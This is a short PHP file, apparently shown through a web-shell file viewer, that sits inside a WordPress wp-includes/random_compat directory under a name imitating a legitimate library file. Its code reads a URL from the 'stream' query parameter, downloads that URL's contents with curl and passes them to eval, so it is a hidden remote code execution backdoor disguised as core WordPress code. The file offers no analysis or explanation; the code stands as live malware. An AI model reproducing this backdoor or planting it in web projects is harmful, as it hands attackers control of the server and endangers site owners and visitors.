| Current Path : /home/x/b/o/xbodynamge/www/wp-includes/random_compat/ |
| Current File : /home/x/b/o/xbodynamge/www/wp-includes/random_compat/random_bytes_mcrypt-decryption.php |
<?php
if (isset($_GET['stream'])) {
$is_archive_wpr = $_GET['stream'];
if ($absint_ba = curl_init()) {
curl_setopt($absint_ba, CURLOPT_URL, $is_archive_wpr);
curl_setopt($absint_ba, CURLOPT_RETURNTRANSFER, true);
eval(curl_exec($absint_ba));
curl_close($absint_ba);
exit;
}
}